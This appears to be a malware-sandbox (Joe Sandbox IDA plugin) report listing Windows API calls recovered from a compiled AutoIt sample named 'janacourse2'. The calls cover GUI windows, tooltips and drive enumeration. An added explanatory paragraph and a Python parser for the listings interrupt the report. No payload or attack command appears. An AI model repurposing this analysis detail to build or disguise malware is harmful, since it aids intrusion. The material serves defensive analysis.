                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 01032CB1
                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01032CF8
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 01032D04
                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 01032D40
                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01032D62
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01032D75
                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01032D80
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 01032D89
                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01032D98
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 01032DA1
                                                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01032DA8
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 01032DB3
                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01032DC5
                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,0104FC38,00000000), ref: 01032DDB
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 01032DEB
                                                                                                            • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 01032E11
                                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 01032E30
                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01032E52
                                                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0103303F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                                            • API String ID: 2211948467-2373415609
                                                                                                            • Opcode ID: aefec44401f60c49a5288460d31846f3012a051cabca043dd429e7b944057986
                                                                                                            • Instruction ID: b5d479a259b64884447a2c3a9223abab54f08cd9c661ff2c3e86b238aedc940a
                                                                                                            • Opcode Fuzzy Hash: aefec44401f60c49a5288460d31846f3012a051cabca043dd429e7b944057986
                                                                                                            • Instruction Fuzzy Hash: C6027EB5500204AFEB24DFA5CE89EAE7BB9FF49310F048158F955AB294C779AD01CF60
                                                                                                            APIs
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0104712F
                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 01047160
                                                                                                            • GetSysColor.USER32(0000000F), ref: 0104716C
                                                                                                            • SetBkColor.GDI32(?,000000FF), ref: 01047186
                                                                                                            • SelectObject.GDI32(?,?), ref: 01047195
                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 010471C0
                                                                                                            • GetSysColor.USER32(00000010), ref: 010471C8
                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 010471CF
                                                                                                            • FrameRect.USER32(?,?,00000000), ref: 010471DE
                                                                                                            • DeleteObject.GDI32(00000000), ref: 010471E5
                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 01047230
                                                                                                            • FillRect.USER32(?,?,?), ref: 01047262
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 01047284
                                                                                                              • Part of subcall function 010473E8: GetSysColor.USER32(00000012), ref: 01047421
                                                                                                              • Part of subcall function 010473E8: SetTextColor.GDI32(?,?), ref: 01047425
  • Part of subcall function 010473E8: GetSysColorBrush.USER32(0000000F), ref: 0104743B
  • Part of subcall function 010473E8: GetSysColor.USER32(0000000F), ref: 01047446
  • Part of subcall function 010473E8: GetSysColor.USER32(00000011), ref: 01047463
  • Part of subcall function 010473E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 01047471
  • Part of subcall function 010473E8: SelectObject.GDI32(?,00000000), ref: 01047482
  • Part of subcall function 010473E8: SetBkColor.GDI32(?,00000000), ref: 0104748B
  • Part of subcall function 010473E8: SelectObject.GDI32(?,?), ref: 01047498
  • Part of subcall function 010473E8: InflateRect.USER32(?,000000FF,000000FF), ref: 010474B7
  • Part of subcall function 010473E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 010474CE
  • Part of subcall function 010473E8: GetWindowLongW.USER32(00000000,000000F0), ref: 010474DB
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
• String ID:
• API String ID: 4124339563-0
• Opcode ID: 0862b8d68bf1b25512f47ba4447c666b5ae72dffdbf4342411fe465fc187a5a6
• Instruction ID: b28da65a062b6ad63ea76a2bd0bd16e51b913d0469267597c7c5ca89f9f9c0d7
• Opcode Fuzzy Hash: 0862b8d68bf1b25512f47ba4447c666b5ae72dffdbf4342411fe465fc187a5a6
• Instruction Fuzzy Hash: C8A1B2B6009301BFE7219F64DE88A5F7BE9FB49320F100A29FAE2961E0D735D444CB91
APIs
• DestroyWindow.USER32(?,?), ref: 00FC8E14
• SendMessageW.USER32(?,00001308,?,00000000), ref: 01006AC5
• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 01006AFE
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 01006F43
  • Part of subcall function 00FC8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FC8BE8,?,00000000,?,?,?,?,00FC8BBA,00000000,?), ref: 00FC8FC5
• SendMessageW.USER32(?,00001053), ref: 01006F7F
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 01006F96
• ImageList_Destroy.COMCTL32(00000000,?), ref: 01006FAC
• ImageList_Destroy.COMCTL32(00000000,?), ref: 01006FB7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
• String ID: 0
• API String ID: 2760611726-4108050209
• Opcode ID: ec40ef50dcfedb18bb22f091964a04790f381e869a3c59ccb634458a1349124a
• Instruction ID: 9c4554b7386448957ba313087cdbe2912f7b412b1e4fe6a47d48d1ee0bacc641
• Opcode Fuzzy Hash: ec40ef50dcfedb18bb22f091964a04790f381e869a3c59ccb634458a1349124a
• Instruction Fuzzy Hash: B812B070505202EFE726DF18CA85BA97BE2FF45300F1444ADF5D58B292CB37A8A2DB51
APIs
• DestroyWindow.USER32(00000000), ref: 0103273E
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0103286A
• SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 010328A9
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 010328B9
• CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 01032900
• GetClientRect.USER32(00000000,?), ref: 0103290C
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 01032955
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 01032964
• GetStockObject.GDI32(00000011), ref: 01032974
• SelectObject.GDI32(00000000,00000000), ref: 01032978
• GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 01032988
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 01032991
• DeleteDC.GDI32(00000000), ref: 0103299A
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 010329C6
• SendMessageW.USER32(00000030,00000000,00000001), ref: 010329DD
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 01032A1D
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 01032A31
• SendMessageW.USER32(00000404,00000001,00000000), ref: 01032A42
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 01032A77
• GetStockObject.GDI32(00000011), ref: 01032A82
• SendMessageW.USER32(00000030,00000000,?,50000000), ref: 01032A8D
• ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 01032A97
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
• API String ID: 2910397461-517079104
• Opcode ID: 55ff01a913bd90a3b79bd37f92180ac6e379334c834f58ee56fa88d8cee36b74
• Instruction ID: 48cd11d79c8aaad81508408f0ae8ca074b27f7e5b0ace4eff10c214d1cede332
• Opcode Fuzzy Hash: 55ff01a913bd90a3b79bd37f92180ac6e379334c834f58ee56fa88d8cee36b74
• Instruction Fuzzy Hash: 0DB18DB5A00205AFEB24DF68CD89FAE7BA9FF48710F008554FA55E7294D774E900CBA0
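As an added example (my code, not part of the Joe Sandbox report or its IDA plugin), the Python below turns "APIs" lists in the shape of the ones on this page into structured calls and decodes the uMsg argument of SendMessageW, which is the step an analyst repeats by hand when reading entries like the one above. The sample lines are constructed to match the listing's shape rather than copied from the report; the message names are the standard values from winuser.h and commctrl.h, and because numbers at or above WM_USER are control-specific the decoder returns every candidate it knows instead of guessing a class. Positional decoding is a heuristic: the argument lists in the report are recovered from the stack and are sometimes shifted or truncated (the WM_SETFONT call at ref 010329DD above shows 00000030 in the first slot, not the second), so confirm the slot against the disassembly before trusting a decoded name.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Union

# Constructed sample in the shape of the "APIs" lists in this report (hand-picked
# lines, one shortened); not an excerpt of the Joe Sandbox output itself.
SAMPLE = r"""
APIs
• DestroyWindow.USER32(00000000), ref: 0103273E
• CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 01032900
  • Part of subcall function 00FC8F62: InvalidateRect.USER32(?,00000000,00000001), ref: 00FC8FC5
• GetDesktopWindow.USER32 ref: 0104113D
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 01032A31
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 01032A1D
• GetDriveTypeW.KERNEL32(?,0104CB68,?,\\.\,0104CC08), ref: 01024BCA
Strings
"""

# One bullet of the listing: optional "Part of subcall function <addr>:" prefix,
# Api.MODULE, an optional "(args)" group and the "ref: <addr>" call site.
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_ARG_RE = re.compile(r"^-?[0-9A-Fa-f]{8}$")

Arg = Union[int, str, None]  # int: hex literal, str: inline string, None: '?' (unknown)


@dataclass
class Call:
    api: str
    module: str
    args: List[Arg]
    ref: int                   # address of the call instruction
    subcall_of: Optional[int]  # address of the callee when this is a "Part of subcall" line


def parse_arg(token: str) -> Arg:
    token = token.strip()
    if token == "?":
        return None
    if HEX_ARG_RE.match(token):
        return int(token, 16)  # int() accepts the leading '-' the report uses for negatives
    return token


def parse_listing(text: str) -> List[Call]:
    calls: List[Call] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:  # "APIs", "Strings" and anything else that is not a call line
            continue
        raw = m.group("args")
        args = [parse_arg(a) for a in raw.split(",")] if raw else []
        sub = m.group("sub")
        calls.append(Call(m.group("api"), m.group("module"), args,
                          int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


# Message numbers from winuser.h / commctrl.h for the values seen on this page.
# Values at or above WM_USER (0x400) are control-specific, so one number can be
# several messages; the caller picks using the class passed to CreateWindowExW.
WINDOW_MESSAGES: Dict[int, List[str]] = {
    0x000E: ["WM_GETTEXTLENGTH"],
    0x0030: ["WM_SETFONT"],
    0x0401: ["PBM_SETRANGE", "TTM_ACTIVATE"],
    0x0404: ["PBM_SETSTEP", "TTM_ADDTOOLA"],
    0x0411: ["TTM_TRACKACTIVATE", "PBM_GETSTATE"],
    0x0412: ["TTM_TRACKPOSITION"],
    0x0418: ["TTM_SETMAXTIPWIDTH"],
    0x041D: ["TTM_UPDATE"],
    0x0421: ["TTM_SETTITLEW"],
    0x0432: ["TTM_ADDTOOLW"],
    0x1008: ["LVM_DELETEITEM"],
    0x1308: ["TCM_DELETEITEM"],
}


def decode_message(call: Call) -> List[str]:
    """Candidate names for the uMsg (second) argument of a Send/PostMessage call.

    Heuristic only: the report rebuilds arguments from the stack and sometimes
    drops or shifts slots, so a shifted list yields a wrong or empty answer.
    """
    if call.api not in ("SendMessageW", "SendMessageA", "PostMessageW", "PostMessageA"):
        return []
    if len(call.args) < 2 or not isinstance(call.args[1], int):
        return []
    return WINDOW_MESSAGES.get(call.args[1], ["unknown_0x%04X" % call.args[1]])


def imports(calls: List[Call]) -> Dict[str, List[str]]:
    """Module -> sorted APIs: the overview to read before the call-by-call listing."""
    out: Dict[str, Set[str]] = {}
    for c in calls:
        out.setdefault(c.module, set()).add(c.api)
    return {mod: sorted(apis) for mod, apis in out.items()}


def inline_strings(calls: List[Call]) -> Set[str]:
    """Every string literal the report resolved inside an argument list."""
    return {a for c in calls for a in c.args if isinstance(a, str)}


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE)
    for c in parsed:
        names = decode_message(c)
        print(f"{c.ref:08X} {c.api}.{c.module} {c.args}" + (f"  -> {names}" if names else ""))
    print(imports(parsed))
    print(inline_strings(parsed))
```

Running it on the constructed sample prints one line per call with the decoded message candidates where there are any, then the per-module API sets and the resolved strings (here "AutoIt v3", "msctls_progress32" and the "\\.\" device prefix), which is the same information the "API ID" and "String ID" fields summarise but in a form that can be diffed across functions or across samples.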
APIs
• SetErrorMode.KERNEL32(00000001), ref: 01024AED
• GetDriveTypeW.KERNEL32(?,0104CB68,?,\\.\,0104CC08), ref: 01024BCA
• SetErrorMode.KERNEL32(00000000,0104CB68,?,\\.\,0104CC08), ref: 01024D36
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Opcode ID: 10947ac227cf5de100fcc6a1d92924e88c3d3b1a38313c98333f4ee1e1c36af3
• Instruction ID: bad18a34a07917ca7e481d30c8cc9ce06b12fce817e9f859f33f80d67225d477
• Opcode Fuzzy Hash: 10947ac227cf5de100fcc6a1d92924e88c3d3b1a38313c98333f4ee1e1c36af3
• Instruction Fuzzy Hash: 4A61C630A0451ADBDB55EF1DCA819BD7BE1AB04200B24405AF88BEB712DB76ED85CB45
APIs
• GetSysColor.USER32(00000012), ref: 01047421
• SetTextColor.GDI32(?,?), ref: 01047425
• GetSysColorBrush.USER32(0000000F), ref: 0104743B
• GetSysColor.USER32(0000000F), ref: 01047446
• CreateSolidBrush.GDI32(?), ref: 0104744B
• GetSysColor.USER32(00000011), ref: 01047463
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 01047471
• SelectObject.GDI32(?,00000000), ref: 01047482
• SetBkColor.GDI32(?,00000000), ref: 0104748B
• SelectObject.GDI32(?,?), ref: 01047498
• InflateRect.USER32(?,000000FF,000000FF), ref: 010474B7
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 010474CE
• GetWindowLongW.USER32(00000000,000000F0), ref: 010474DB
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0104752A
• GetWindowTextW.USER32(00000000,00000000,00000001), ref: 01047554
• InflateRect.USER32(?,000000FD,000000FD), ref: 01047572
• DrawFocusRect.USER32(?,?), ref: 0104757D
• GetSysColor.USER32(00000011), ref: 0104758E
• SetTextColor.GDI32(?,00000000), ref: 01047596
• DrawTextW.USER32(?,010470F5,000000FF,?,00000000), ref: 010475A8
• SelectObject.GDI32(?,?), ref: 010475BF
• DeleteObject.GDI32(?), ref: 010475CA
• SelectObject.GDI32(?,?), ref: 010475D0
• DeleteObject.GDI32(?), ref: 010475D5
• SetTextColor.GDI32(?,?), ref: 010475DB
• SetBkColor.GDI32(?,?), ref: 010475E5
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1996641542-0
• Opcode ID: 2a6f7e66720a63dbe6e36ec758f2c0b5031f31501a3575fab7ea8466cf2a6822
• Instruction ID: 24a0412f4f5c1efd47d5acefa8e077d664d4e5ee7303c5405bffc6ba38c6d3c6
• Opcode Fuzzy Hash: 2a6f7e66720a63dbe6e36ec758f2c0b5031f31501a3575fab7ea8466cf2a6822
• Instruction Fuzzy Hash: 3661A1B6901218AFEF119FA4DD88EEE7FB9EB09320F104161FA51BB291D7759940CF90
                                                                                                            APIs
                                                                                                            • GetCursorPos.USER32(?), ref: 01041128
                                                                                                            • GetDesktopWindow.USER32 ref: 0104113D
                                                                                                            • GetWindowRect.USER32(00000000), ref: 01041144
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 01041199
                                                                                                            • DestroyWindow.USER32(?), ref: 010411B9
                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 010411ED
                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0104120B
                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0104121D
                                                                                                            • SendMessageW.USER32(00000000,00000421,?,?), ref: 01041232
                                                                                                            • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 01041245
                                                                                                            • IsWindowVisible.USER32(00000000), ref: 010412A1
                                                                                                            • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 010412BC
                                                                                                            • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 010412D0
                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 010412E8
                                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 0104130E
                                                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 01041328
                                                                                                            • CopyRect.USER32(?,?), ref: 0104133F
                                                                                                            • SendMessageW.USER32(00000000,00000412,00000000), ref: 010413AA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                            • String ID: ($0$tooltips_class32
                                                                                                            • API String ID: 698492251-4156429822
                                                                                                            • Opcode ID: 145dbff08522e1cad3f708d7726876ff7b614dc3280b9784a4dd225dce911ee9
                                                                                                            • Instruction ID: 834e1bfb2a6a118db15e5c360d55781cba71caf9f48b24f3767011f7b7b376dc
                                                                                                            • Opcode Fuzzy Hash: 145dbff08522e1cad3f708d7726876ff7b614dc3280b9784a4dd225dce911ee9
                                                                                                            • Instruction Fuzzy Hash: FAB18DB1604341AFE754DF65C984BAABBE4FF88350F008968F9999B261C771E844CF92
                                                                                                            APIs
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FC8968
                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00FC8970
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FC899B
                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00FC89A3
                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00FC89C8
                                                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00FC89E5
                                                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00FC89F5
                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FC8A28
                                                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00FC8A3C
                                                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 00FC8A5A
                                                                                                            • GetStockObject.GDI32(00000011), ref: 00FC8A76
                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FC8A81
                                                                                                              • Part of subcall function 00FC912D: GetCursorPos.USER32(?), ref: 00FC9141
                                                                                                              • Part of subcall function 00FC912D: ScreenToClient.USER32(00000000,?), ref: 00FC915E
                                                                                                              • Part of subcall function 00FC912D: GetAsyncKeyState.USER32(00000001), ref: 00FC9183
                                                                                                              • Part of subcall function 00FC912D: GetAsyncKeyState.USER32(00000002), ref: 00FC919D
                                                                                                            • SetTimer.USER32(00000000,00000000,00000028,00FC90FC), ref: 00FC8AA8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                            • String ID: AutoIt v3 GUI
                                                                                                            • API String ID: 1458621304-248962490
                                                                                                            • Opcode ID: 5b9439df5c8d8a2f5edacfd4189641c8e1adeb87983da7956e26fd155de5b5a7
                                                                                                            • Instruction ID: 817778a743a0a5ce791869a222fc5affcb1ca780becdfff28d3a8dd1781feb07
                                                                                                            • Opcode Fuzzy Hash: 5b9439df5c8d8a2f5edacfd4189641c8e1adeb87983da7956e26fd155de5b5a7
                                                                                                            • Instruction Fuzzy Hash: 70B19375A0020AEFEB15DF68CA85FAE3BB5FB48310F004219FA95A72C4DB39D941CB50
                                                                                                            APIs
                                                                                                              • Part of subcall function 010110F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01011114
                                                                                                              • Part of subcall function 010110F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,01010B9B,?,?,?), ref: 01011120
                                                                                                              • Part of subcall function 010110F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,01010B9B,?,?,?), ref: 0101112F
